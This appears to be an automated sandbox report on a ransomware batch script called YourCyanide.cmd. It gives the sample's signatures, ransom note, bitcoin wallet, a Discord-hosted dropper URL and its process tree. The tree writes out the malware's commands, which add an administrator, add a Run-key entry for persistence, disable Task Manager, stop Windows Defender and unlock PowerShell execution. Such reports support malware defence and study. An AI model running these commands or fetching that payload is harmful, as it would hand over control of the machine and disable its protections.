1f3e3ed8e708fc98bddddca71de7b9e21c6d2a4b2bf019c260e0b707140f9f62

Resubmissions

15-11-2024 12:51

241115-p3ywnsthmh 9

18-05-2022 00:35

220518-axmh5abbc9 10

18-05-2022 00:32

220518-avncmsbbb7 10

Analysis

max time kernel
52s
max time network
118s
platform
windows10-2004_x64
resource
win10v2004-20220414-en
submitted
18-05-2022 00:35

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

YourCyanide.cmd
Size

90KB
MD5

4cb725f17bec289507f9e8249c8ea80e
SHA1

a7034e84cb884bf90e61ce3b621424bec57334ae
SHA256

1f3e3ed8e708fc98bddddca71de7b9e21c6d2a4b2bf019c260e0b707140f9f62
SHA512

776982eab99b1285c209b71e2fd39e2765e9ce392a6c310208e72157dab3895b0b5a7c8b63d72e69bc507c88faec90a2f8f57788873f1a617a2659e22d2b7288

Score

10^/10

evasion persistence ransomware

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

exe.dropper

https://cdn.discordapp.com/attachments/971160786015772724/971191444410875914/GetToken.exe

Extracted

Path

C:\Users\Admin\Desktop\YcynNote.txt

Ransom Note

Q: What happened to my files? A: Oops your files have been encrypted by YourCyanide. Q: how can I get them back? A: You can get them back by paying $500 in bitcoin to this btc wallet bc1qrl532s9r2qge8d8p7qlrq57dc4uhssqjexmlwf. Q: What happens if I dont pay A: You will never get your files back. Q: How can I contact you A: contact at [email protected] ++++++++++++++++++++++++++++++++++++++++++++ 18064 Files have been encrypted

Emails

[email protected]

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098
Blocklisted process makes network request 1 IoCs

Processes:

powershell.exe

flow pid process

19 4540 powershell.exe
Disables Task Manager via registry modification
evasion
Downloads MZ/PE file
Executes dropped EXE 1 IoCs

Processes:

netsh.exe

pid process

2428 netsh.exe
Modifies Windows Firewall 1 TTPs
evasion

Modify Existing Service
T1031
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.

Query Registry
T1012

System Information Discovery
T1082

Processes:

cmd.exe

description ioc process

Key value queried \REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation cmd.exe

flow	pid	process
19	4540	powershell.exe

pid	process
2428	netsh.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Control Panel\International\Geo\Nation	cmd.exe

Adds Run key to start application 2 TTPs 6 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

Processes:

reg.exereg.exenetsh.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_4964_toolbar = "C:\\Users\\Admin\\AppData\\Local\\Temp\\YourCyanide.cmd"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Run	reg.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\rundll32_5072_toolbar = "ycynlog.cmd"	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\Software\Microsoft\Windows\CurrentVersion\Run	netsh.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AVAADA = "C:\\Windows\\.bat"	netsh.exe

Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Drops file in Windows directory 2 IoCs

Processes:

cmd.exe

description ioc process

File opened for modification C:\Windows\win.ini cmd.exe
File opened for modification C:\Windows\system.ini cmd.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082
Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery
T1057

Processes:

tasklist.exe

pid process

1672 tasklist.exe
Gathers network information 2 TTPs 1 IoCs
Uses commandline utility to view network configuration.

System Information Discovery
T1082

Command-Line Interface
T1059

Processes:

ipconfig.exe

pid process

4692 ipconfig.exe
Gathers system information 1 TTPs 1 IoCs
Runs systeminfo.exe.

System Information Discovery
T1082

Processes:

systeminfo.exe

pid process

3136 systeminfo.exe
Kills process with taskkill 1 IoCs
evasion

Processes:

taskkill.exe

pid process

3016 taskkill.exe

description	ioc	process
File opened for modification	C:\Windows\win.ini	cmd.exe
File opened for modification	C:\Windows\system.ini	cmd.exe

pid	process
1672	tasklist.exe

pid	process
4692	ipconfig.exe

pid	process
3136	systeminfo.exe

pid	process
3016	taskkill.exe

Modifies registry class 21 IoCs

Processes:

powershell.execmd.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 02	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\MRUListEx = ffffffff	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell\SniffedFolderType = "Documents"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0 = 14001f50e04fd020ea3a6910a2d808002b30309d0000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\CLSID\{018D5C66-4533-4307-9B53-224DE2ED1FE6}\Instance\	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 00000000ffffffff	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0 = 14002e80922b16d365937a46956b92703aca08af0000	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = ffffffff	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\MRUListEx = 00000000ffffffff	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\NodeSlot = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1\Shell	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\1	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1081944012-3634099177-1681222835-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{4336a54d-038b-4685-ab02-99bb52d3fb8b}\Instance\	powershell.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

2900 reg.exe

pid	process
2900	reg.exe

NTFS ADS 4 IoCs

Processes:

cmd.execmd.exe

description	ioc	process
File opened for modification	C:\Users\Admin\AppData\Local\Temp\%YTsAV:~24	cmd.exe
File opened for modification	C:\Users\Admin\%ONRsX:~13	cmd.exe
File opened for modification	C:\Users\Admin\%onRsx:~13	cmd.exe
File opened for modification	C:\Users\Admin\%RafEw:~4	cmd.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 57 IoCs

Processes:

powershell.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exetskill.exepowershell.exepowershell.exenetsh.exepowershell.exenetsh.exenetsh.exenetsh.exepowershell.exenetsh.exenetsh.exepowershell.exe

pid	process
4252	powershell.exe
4252	powershell.exe
4252	powershell.exe
3180	tskill.exe
3180	tskill.exe
4576	tskill.exe
4576	tskill.exe
4912	tskill.exe
4912	tskill.exe
2560	tskill.exe
2560	tskill.exe
1264	tskill.exe
1264	tskill.exe
3484	tskill.exe
3484	tskill.exe
4700	tskill.exe
4700	tskill.exe
4076	tskill.exe
4076	tskill.exe
2812	tskill.exe
2812	tskill.exe
4056	tskill.exe
4056	tskill.exe
4704	tskill.exe
4704	tskill.exe
3132	tskill.exe
3132	tskill.exe
176	tskill.exe
176	tskill.exe
4540	powershell.exe
4540	powershell.exe
4540	powershell.exe
4060	powershell.exe
4060	powershell.exe
2220	netsh.exe
2220	netsh.exe
2220	netsh.exe
1264	powershell.exe
1264	powershell.exe
1264	powershell.exe
4060	netsh.exe
3132	netsh.exe
3132	netsh.exe
2220	netsh.exe
1264	powershell.exe
4060	netsh.exe
2652	powershell.exe
2652	powershell.exe
3132	netsh.exe
2652	powershell.exe
3132	netsh.exe
2012	netsh.exe
2012	netsh.exe
2012	netsh.exe
2564	powershell.exe
2564	powershell.exe
2564	powershell.exe

Suspicious use of AdjustPrivilegeToken 10 IoCs

Processes:

powershell.exetaskkill.exepowershell.exepowershell.exenetsh.exepowershell.exenetsh.exepowershell.exenetsh.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4252	powershell.exe
Token: SeDebugPrivilege	3016	taskkill.exe
Token: SeDebugPrivilege	4540	powershell.exe
Token: SeDebugPrivilege	4060	powershell.exe
Token: SeDebugPrivilege	2220	netsh.exe
Token: SeDebugPrivilege	1264	powershell.exe
Token: SeDebugPrivilege	3132	netsh.exe
Token: SeDebugPrivilege	2652	powershell.exe
Token: SeDebugPrivilege	2012	netsh.exe
Token: SeDebugPrivilege	2564	powershell.exe

Suspicious use of SetWindowsHookEx 1 IoCs

Processes:

powershell.exe

pid process

2652 powershell.exe

pid	process
2652	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exenet.execmd.execmd.exenet.exenet.exe

description	pid	process	target process
PID 1928 wrote to memory of 4872	1928	cmd.exe	attrib.exe
PID 1928 wrote to memory of 4872	1928	cmd.exe	attrib.exe
PID 1928 wrote to memory of 4704	1928	cmd.exe	rundll32.exe
PID 1928 wrote to memory of 4704	1928	cmd.exe	rundll32.exe
PID 1928 wrote to memory of 4812	1928	cmd.exe	cmd.exe
PID 1928 wrote to memory of 4812	1928	cmd.exe	cmd.exe
PID 1928 wrote to memory of 1484	1928	cmd.exe	cmd.exe
PID 1928 wrote to memory of 1484	1928	cmd.exe	cmd.exe
PID 1928 wrote to memory of 1620	1928	cmd.exe	cmd.exe
PID 1928 wrote to memory of 1620	1928	cmd.exe	cmd.exe
PID 1928 wrote to memory of 444	1928	cmd.exe	cmd.exe
PID 1928 wrote to memory of 444	1928	cmd.exe	cmd.exe
PID 1928 wrote to memory of 724	1928	cmd.exe	cmd.exe
PID 1928 wrote to memory of 724	1928	cmd.exe	cmd.exe
PID 1928 wrote to memory of 4252	1928	cmd.exe	powershell.exe
PID 1928 wrote to memory of 4252	1928	cmd.exe	powershell.exe
PID 1928 wrote to memory of 4724	1928	cmd.exe	net.exe
PID 1928 wrote to memory of 4724	1928	cmd.exe	net.exe
PID 4724 wrote to memory of 4636	4724	net.exe	net1.exe
PID 4724 wrote to memory of 4636	4724	net.exe	net1.exe
PID 1928 wrote to memory of 2020	1928	cmd.exe	reg.exe
PID 1928 wrote to memory of 2020	1928	cmd.exe	reg.exe
PID 1928 wrote to memory of 4412	1928	cmd.exe	reg.exe
PID 1928 wrote to memory of 4412	1928	cmd.exe	reg.exe
PID 1928 wrote to memory of 5036	1928	cmd.exe	cmd.exe
PID 1928 wrote to memory of 5036	1928	cmd.exe	cmd.exe
PID 1928 wrote to memory of 3476	1928	cmd.exe	cmd.exe
PID 1928 wrote to memory of 3476	1928	cmd.exe	cmd.exe
PID 1928 wrote to memory of 4644	1928	cmd.exe	net.exe
PID 1928 wrote to memory of 4644	1928	cmd.exe	net.exe
PID 4644 wrote to memory of 3956	4644	net.exe	net1.exe
PID 4644 wrote to memory of 3956	4644	net.exe	net1.exe
PID 3476 wrote to memory of 2928	3476	cmd.exe	scrnsave.scr
PID 3476 wrote to memory of 2928	3476	cmd.exe	scrnsave.scr
PID 5036 wrote to memory of 1560	5036	cmd.exe	scrnsave.scr
PID 5036 wrote to memory of 1560	5036	cmd.exe	scrnsave.scr
PID 5036 wrote to memory of 256	5036	cmd.exe	scrnsave.scr
PID 5036 wrote to memory of 256	5036	cmd.exe	scrnsave.scr
PID 3476 wrote to memory of 1764	3476	cmd.exe	scrnsave.scr
PID 3476 wrote to memory of 1764	3476	cmd.exe	scrnsave.scr
PID 5036 wrote to memory of 3704	5036	cmd.exe	scrnsave.scr
PID 5036 wrote to memory of 3704	5036	cmd.exe	scrnsave.scr
PID 3476 wrote to memory of 2080	3476	cmd.exe	scrnsave.scr
PID 3476 wrote to memory of 2080	3476	cmd.exe	scrnsave.scr
PID 1928 wrote to memory of 3016	1928	cmd.exe	taskkill.exe
PID 1928 wrote to memory of 3016	1928	cmd.exe	taskkill.exe
PID 5036 wrote to memory of 4568	5036	cmd.exe	scrnsave.scr
PID 5036 wrote to memory of 4568	5036	cmd.exe	scrnsave.scr
PID 3476 wrote to memory of 3904	3476	cmd.exe	scrnsave.scr
PID 3476 wrote to memory of 3904	3476	cmd.exe	scrnsave.scr
PID 5036 wrote to memory of 2496	5036	cmd.exe	scrnsave.scr
PID 5036 wrote to memory of 2496	5036	cmd.exe	scrnsave.scr
PID 1928 wrote to memory of 4856	1928	cmd.exe	net.exe
PID 1928 wrote to memory of 4856	1928	cmd.exe	net.exe
PID 4856 wrote to memory of 4376	4856	net.exe	net1.exe
PID 4856 wrote to memory of 4376	4856	net.exe	net1.exe
PID 3476 wrote to memory of 1276	3476	cmd.exe	scrnsave.scr
PID 3476 wrote to memory of 1276	3476	cmd.exe	scrnsave.scr
PID 5036 wrote to memory of 1660	5036	cmd.exe	scrnsave.scr
PID 5036 wrote to memory of 1660	5036	cmd.exe	scrnsave.scr
PID 1928 wrote to memory of 4960	1928	cmd.exe	net.exe
PID 1928 wrote to memory of 4960	1928	cmd.exe	net.exe
PID 4960 wrote to memory of 2584	4960	net.exe	net1.exe
PID 4960 wrote to memory of 2584	4960	net.exe	net1.exe

Views/modifies file attributes 1 TTPs 2 IoCs
evasion

Hidden Files and Directories
T1158

Processes:

attrib.exeattrib.exe

pid process

1624 attrib.exe
4872 attrib.exe

pid	process
1624	attrib.exe
4872	attrib.exe

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd"
1⤵
- Checks computer location settings
- Drops file in Windows directory
- Modifies registry class
- NTFS ADS
- Suspicious use of WriteProcessMemory
PID:1928
- C:\Windows\system32\attrib.exe
  attrib +h +s C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd
  2⤵
  - Views/modifies file attributes
  PID:4872
- C:\Windows\system32\rundll32.exe
  RUNDLL32 USER32.DLL SwapMouseButton
  2⤵
  PID:4704
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:4812
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1484
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:1620
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:444
- C:\Windows\system32\cmd.exe
  cmd.exe
  2⤵
  PID:724
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -command "Set-ExecutionPolicy Unrestricted"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4252
- C:\Windows\system32\net.exe
  net localgroup administrators session /ADD
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4724
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 localgroup administrators session /ADD
    3⤵
    PID:4636
- C:\Windows\system32\reg.exe
  reg add "hklm\Software\Microsoft\Windows\CurrentVersion\Run" /v "rundll32_4964_toolbar" /t "REG_SZ" /d C:\Users\Admin\AppData\Local\Temp\YourCyanide.cmd /f
  2⤵
  - Adds Run key to start application
  PID:2020
- C:\Windows\system32\reg.exe
  reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_SZ /d 1 /f
  2⤵
  PID:4412
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K black.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:5036
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1560
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:256
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3704
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4568
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2496
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1660
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4180
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2916
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5108
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3984
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3056
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4128
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2560
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4092
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:940
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4724
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1560
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4332
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4044
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3748
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2256
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2316
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1868
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2180
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1892
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4052
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4208
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3548
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3132
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:660
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4192
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:508
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4072
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1764
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5084
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3012
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1964
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3992
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3716
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3820
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4300
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3180
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3308
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4092
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4716
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1544
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4348
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4196
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1088
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3424
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2160
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4060
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:5028
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1592
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2460
- C:\Windows\system32\net.exe
  net stop "WinDefend"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:4644
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WinDefend"
    3⤵
    PID:3956
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /K black.bat
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:3476
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2928
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1764
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2080
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3904
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1276
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2220
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1860
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4900
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1844
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3724
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3968
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3548
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3860
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4704
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4192
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1740
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1280
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4532
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2356
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1088
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4660
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2556
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4924
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3992
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4060
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1884
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2560
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4872
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4760
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:212
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2996
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4456
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1428
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1416
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:768
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4900
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4316
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4572
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3004
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:3556
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1580
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2216
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2176
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:1348
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:2124
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:4252
- - C:\Windows\system32\scrnsave.scr
    C:\Windows\system32\scrnsave.scr /s
    3⤵
    PID:320
- - C:\Windows\system32\scrnsave.scr
